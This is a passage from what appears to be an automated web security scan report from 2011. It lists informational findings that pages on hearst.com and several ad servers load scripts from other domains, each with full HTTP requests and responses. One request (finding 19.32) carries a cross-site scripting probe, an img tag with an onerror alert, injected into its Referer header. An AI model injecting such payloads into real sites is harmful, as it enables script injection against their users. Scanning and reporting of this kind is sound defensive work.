Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:53 GMT
Server: Apache/2.2.3 (Linux/SUSE)
X-Powered-By: PHP/5.2.5
Content-Type: text/html
Content-Length: 12041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hearst Corporation</title>
<meta name="keywords" content=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
19.22. http://hearst.com/newspapers/hearst-news-service.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearst.com
Path:   /newspapers/hearst-news-service.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /newspapers/hearst-news-service.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/seattlepicom.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:24:22 GMT
Server: Apache/2.2.3 (Linux/SUSE)
X-Powered-By: PHP/5.2.5
Content-Type: text/html
Content-Length: 10765

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hearst Corporation</title>
<meta name="keywords" content=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
19.23. http://hearst.com/newspapers/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearst.com
Path:   /newspapers/index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /newspapers/index.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/press-room/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:38 GMT
Server: Apache/2.2.3 (Linux/SUSE)
X-Powered-By: PHP/5.2.5
Content-Type: text/html
Content-Length: 12876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hearst Corporation</title>
<meta name="keywords" content=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
19.24. http://hearst.com/newspapers/localedge.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearst.com
Path:   /newspapers/localedge.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /newspapers/localedge.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/hearst-news-service.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:24:32 GMT
Server: Apache/2.2.3 (Linux/SUSE)
X-Powered-By: PHP/5.2.5
Content-Type: text/html
Content-Length: 14862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hearst Corporation</title>
<meta name="keywords" content=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
19.25. http://hearst.com/newspapers/metrix4media.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearst.com
Path:   /newspapers/metrix4media.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /newspapers/metrix4media.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/localedge.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:27:12 GMT
Server: Apache/2.2.3 (Linux/SUSE)
X-Powered-By: PHP/5.2.5
Content-Type: text/html
Content-Length: 11041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hearst Corporation</title>
<meta name="keywords" content=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
19.26. http://hearst.com/newspapers/seattlepicom.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearst.com
Path:   /newspapers/seattlepicom.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /newspapers/seattlepicom.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/albany-times-union.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:24:11 GMT
Server: Apache/2.2.3 (Linux/SUSE)
X-Powered-By: PHP/5.2.5
Content-Type: text/html
Content-Length: 12173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hearst Corporation</title>
<meta name="keywords" content=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
19.27. http://hearst.com/newspapers/the-advocate.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearst.com
Path:   /newspapers/the-advocate.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /newspapers/the-advocate.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:42 GMT
Server: Apache/2.2.3 (Linux/SUSE)
X-Powered-By: PHP/5.2.5
Content-Type: text/html
Content-Length: 11239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hearst Corporation</title>
<meta name="keywords" content=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
19.28. http://hearst.com/press-room/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearst.com
Path:   /press-room/index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press-room/index.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/about-hearst/corporate-mark-e-aldam.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:11 GMT
Server: Apache/2.2.3 (Linux/SUSE)
X-Powered-By: PHP/5.2.5
Content-Type: text/html
Content-Length: 38533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hearst Corporation</title>
<meta name="keywords" content=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
19.29. http://internetmarketing.localedge.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://internetmarketing.localedge.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: internetmarketing.localedge.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 16:36:37 GMT
Server: Apache/2.2.10 (Unix) DAV/2 PHP/5.2.6 mod_jk/1.2.30
X-Powered-By: PHP/5.2.6
X-Pingback: http://internetmarketing.localedge.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from wd-44
Via: 1.0 wd-44 (squid/3.1.11)
Connection: close

<!DOCTYPE html>

<!--[if IE 6]>
<html id="ie6" dir="ltr" lang="en-US">
<![endif]-->
<!--[if IE 7]>
<html id="ie7" dir="ltr" lang="en-US">
<![endif]-->
<!--[if IE 8]>
<html id="ie8" dir="ltr"
...[SNIP]...
<!-- jQuery -->
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js"></script>
...[SNIP]...
19.30. http://internetmarketing.localedge.com/wp-content/themes/images/default.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://internetmarketing.localedge.com
Path:   /wp-content/themes/images/default.png

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/themes/images/default.png HTTP/1.1
Host: internetmarketing.localedge.com
Proxy-Connection: keep-alive
Referer: http://internetmarketing.localedge.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Sat, 17 Sep 2011 16:39:06 GMT
Server: Apache/2.2.10 (Unix) DAV/2 PHP/5.2.6 mod_jk/1.2.30
X-Powered-By: PHP/5.2.6
X-Pingback: http://internetmarketing.localedge.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:39:06 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from wd-44
Via: 1.0 wd-44 (squid/3.1.11)
Connection: close

<!DOCTYPE html>

<!--[if IE 6]>
<html id="ie6" dir="ltr" lang="en-US">
<![endif]-->
<!--[if IE 7]>
<html id="ie7" dir="ltr" lang="en-US">
<![endif]-->
<!--[if IE 8]>
<html id="ie8" dir="ltr"
...[SNIP]...
<!-- jQuery -->
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js"></script>
...[SNIP]...
19.31. http://js.zvents.com/javascripts/happy_partner_widgets.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.zvents.com
Path:   /javascripts/happy_partner_widgets.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /javascripts/happy_partner_widgets.js HTTP/1.1
Host: js.zvents.com
Proxy-Connection: keep-alive
Referer: http://www.stamfordadvocate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 57287
Date: Sat, 17 Sep 2011 00:28:12 GMT
Expires: Sat, 17 Sep 2011 04:28:12 GMT
Cache-Control: max-age=14400
Content-Length: 120508
Connection: Keep-Alive
Via: NS-CACHE-8.0: 1
Server: nginx/0.6.39
Content-Type: application/x-javascript
Last-Modified: Tue, 13 Sep 2011 21:38:02 GMT


zvents_save_jquery={};if(typeof jQuery!='undefined')zvents_save_jquery.jQuery=jQuery;if(typeof $!='undefined')zvents_save_jquery.$=$;(function(A,w){function ma(){if(!c.isReady){try{s.documentElement.
...[SNIP]...
</script>','<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
19.32. http://media.contextweb.com/creatives/BackupTags/530930/82ee614d-b189-4b28-8d83-df850b76e9fbAdKarma_728x90..html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.contextweb.com
Path:   /creatives/BackupTags/530930/82ee614d-b189-4b28-8d83-df850b76e9fbAdKarma_728x90..html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /creatives/BackupTags/530930/82ee614d-b189-4b28-8d83-df850b76e9fbAdKarma_728x90..html HTTP/1.1
Host: media.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg+src=a+onerror=alert(%22XSS%22)%3E31b7c6065d67ada9d
Cookie: V=ZZVrXBMk1mFi; cwbh1=3055%3B10%2F02%2F2011%3BMCRI1%0A1443%3B09%2F21%2F2011%3BNETM7%0A3283%3B10%2F06%2F2011%3BTMII1%0A996%3B10%2F12%2F2011%3BFACO1; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|534889.y9dly9jlztlwn.0|535461.9033442320916087634.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|531292.BO-00000000521444319.0|537085.439524AE9E11374EB2C0C71740C604.0|538303.x.0|538569.776b70d9-5df4-4d1b-98af-982dd1709cac.0"; C2W4=3ZWkodKrBuUFHIpAOk9fo5hjK_amQu3P6HhM4sg24rYSrdGNgVCZJAg; cw=cw; FC1-WC=53620_1_3ELLi; vf=2; 530930_4_90495_1=1316277840578

Response

HTTP/1.1 200 OK
Cteonnt-Length: 248
Content-Type: text/html
Last-Modified: Wed, 05 Jan 2011 16:52:38 GMT
Accept-Ranges: bytes
ETag: "0cf72f5f8accb1:43d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 17:05:29 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Content-Length: 248

<script language="JavaScript">
var zflag_nid="1432"; var zflag_cid="1"; var zflag_sid="1"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14";
</script>
<script language="JavaScript" src="http://c5.zedo.com/jsc/c5/fo.js"></script>
...[SNIP]...
19.33. http://pbid.pro-market.net/engine  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pbid.pro-market.net
Path:   /engine

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /engine?site=111778;size=1x1;kw=%20-%20Search%20for%20local%20businesses,%20events,%20and%20coupons%20near%20you;siteref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue;rnd=(1316295499352) HTTP/1.1
Host: pbid.pro-market.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/
Cookie: anSt=0+4+jT2beH|oV~T<n4#E)_`zjW4wf*Qvx=eu!T<iaR@{Sq/yP&nYQ%J8`bOr))FB\!!7>g\2N$\$K\EZu'W~9Jr162wg:MyYeDw6H=`m&L`^PS@:^Azn!I61/ytF(`LCA!ZB0}3S5\!!LH]\2N$\$K\z5%vEThH>_B=#7tJy5e"N%U)(O~aq/'tziEX.Em|J0q=!o.tNsexTp@[J<T\!!7>g\2N$\$K; anTHS=42%7C1312579892800%23; anTD4=omMtz0ElZavIaEGuzNfzmpj8mdQ1xOk70fBZtnElvasmQ%7C_320100%7C122555%7C1312579892444%7C8%2C14%2C18%23omMtz0ElZavIaEGuzNfzmpj8mdQ1xOk70fBZtnElvasmQ%7C_160800%7C122555%7C1312579892444%7C8%2C4; anHistory=2vzuu3+2+!%11d$j#Q(515#$Y#N/F1Y9$K#KKk; anProfile=2vzuu3+0+s0=(6f)+h=bc+1m=1+rv=(-8)+1j=57:1+rt='32177B6A'+rs=c+1f=d+4=2lx

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NOI DSP COR NID CURa ADMo TAIa PSAo PSDo OUR SAMo BUS UNI PUR COM NAV INT DEM CNT STA PRE LOC"
ANServer: app2.ny
Pragma: no-cache
Cache-Control: no-cache
Expires: Mon, 1 Jan 1990 0:0:0 GMT
Content-Type: text/html
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:55:27 GMT
Connection: close

<html><body rightmargin=0 leftmargin=0 topmargin=0 bottommargin=0><SCRIPT LANGUAGE="JavaScript">
<!--
try {
var tcdacmd="dt";
var t="search+for+local+businesses+events+and+coupons+near+yo
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/18182/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
19.34. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf?t=1316294786641&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.quickandsimple.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.quickandsimple.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1308
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:36:43 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:728px;height:90px;margin:0;border:0">


<script src='http://ad.turn.com/server/ads.js?pub=5757418&cch=5766966&code=5766974&l=728x90&aid=26991068&ahcid=2258492&bimpd=ZfCrXJhGSY0Y4IVoRGQFIPDPg0Y_U7_3nhJpO2wUhWxcSqekmrJ-OkxvaBCzY3eZ1pDEEKT32Tu_zkVMBM13YXETQudoxG65t8gPvD3_8uXyApHz0cTr9LeydkTtbIhVaX2nKNkPJtLnVJH8FV4Dd2BZLb2fS1F5Scj_HvzyiMK3eTg-fysVL4NxFZ5v_CHNlgeNc_NrCEydDCc3CvAgfciaxPgesnMeI3JvshK38UBZmdvUBbyfigS7QKd3XwFGLXXmgJH1qmmEMYCR4OpdnlcwHwG_6JrrgxV7HzVF-v697ZaK9XBtZEQvEubwtYTVVBQLLq7j6F3iNOZuKo0JXQPRebdb04CqsJUmdmy5UnsfWiULP-ZEZGDt0IqdLMwBsr6a6YqtrLJT4cqZXQrL0U1Ju8lLS0J5izWRkss6rstwkoE4Thgw2wlkh46ZlsDWqZUn-7KntDl9L8p4pH9fDXaoBUsWtsZZqH0CVvFPBCr_mAo4nf999NQU7V_JRN_j4QimPJYaK6Zn7b8VCPKVAbGFEBRqN0QbGT1SlHKoMnOUwz1lVaf0RwqnshRhX3_tvfBz5xDsVEqchMpjM7fNhdp3jJC_ymtOnz-MeVT9G4f947Yd5VEVT_VqJa1Vb2COvVyAA-f4Y6G0narfvPyHg4AnIT2lP-u4t0jxCVmL47PZzw7Sqi-NDB9GTcO6mju0gCchPaU_67i3SPEJWYvjsw0VVYxOKi1KVJX4e1Hsry-bRohoymHI1165xYwXluCxcKUsk3pyz8E7r6AyUKnzbf23BOOYN5DOwJ7MDeQLuEvq0tQJszidBUwiqxGdKZ-CEvmONAwrRCaTz4lB29IygQ&acp=1.01'></script>
...[SNIP]...
19.35. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf?t=1316296513555&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.quickandsimple.com%2F&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: tag.admeld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.quickandsimple.com/
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1329
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:54:00 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:728px;height:90px;margin:0;border:0">


<script src='http://ad.turn.com/server/ads.js?pub=5757418&cch=5766966&code=5766974&l=728x90&aid=26991068&ahcid=2258492&bimpd=Qry6iq284Zi1fMTNdDxpNjCvgtzo8PLO8tMpbWZ7kvTnVgsAC3RRiT32ikVdGX1hMH0tG3SQtVbaNlHv6FfeTHETQudoxG65t8gPvD3_8uXyApHz0cTr9LeydkTtbIhVaX2nKNkPJtLnVJH8FV4Dd2BZLb2fS1F5Scj_HvzyiMK3eTg-fysVL4NxFZ5v_CHNlgeNc_NrCEydDCc3CvAgfciaxPgesnMeI3JvshK38UDVDHqv4CHtGAnNLHtx7QEuLXXmgJH1qmmEMYCR4OpdnlcwHwG_6JrrgxV7HzVF-v697ZaK9XBtZEQvEubwtYTVVBQLLq7j6F3iNOZuKo0JXQPRebdb04CqsJUmdmy5UnsfWiULP-ZEZGDt0IqdLMwBsr6a6YqtrLJT4cqZXQrL0U1Ju8lLS0J5izWRkss6rstwkoE4Thgw2wlkh46ZlsDWqZUn-7KntDl9L8p4pH9fDXaoBUsWtsZZqH0CVvFPBCr_mAo4nf999NQU7V_JRN_j4QimPJYaK6Zn7b8VCPKVAbGFEBRqN0QbGT1SlHKoMnOUwz1lVaf0RwqnshRhX3_tvfBz5xDsVEqchMpjM7fNhbzeQXEetXFbLTjErKX1F6z947Yd5VEVT_VqJa1Vb2COvVyAA-f4Y6G0narfvPyHg4AnIT2lP-u4t0jxCVmL47PZzw7Sqi-NDB9GTcO6mju0gCchPaU_67i3SPEJWYvjs4xqrYWC46qwOYfu3hndDyJSZI-llQBy1yA5heRW7zlYHhA6Vl3lcfiJZZgyheDhRgsBDmGfDjXnMX2vSEpleyEmpo50ca90u9BSXmAdtLgHsUzp-la3Au1IHTldH8eSwZRfnCdxLbPC3h7TxlbVEY4&acp=1.01'></script>
...[SNIP]...
19.36. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/hearst/300x250/ht_1064834_61686626

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316295392631&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 462
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:35:20 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">


<script src="http://mpd.mxptint.net/1/S74.API/G1/T124/js?siz=300x250&mid=B139_2770402E_10AB98E&bp=3.76&sp=2.31&dm=c2VhdHRsZXBpLmNvbQ&cpd=2605"></script>
...[SNIP]...
19.37. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/hearst/300x250/ht_1064834_61686626

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316295375688&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
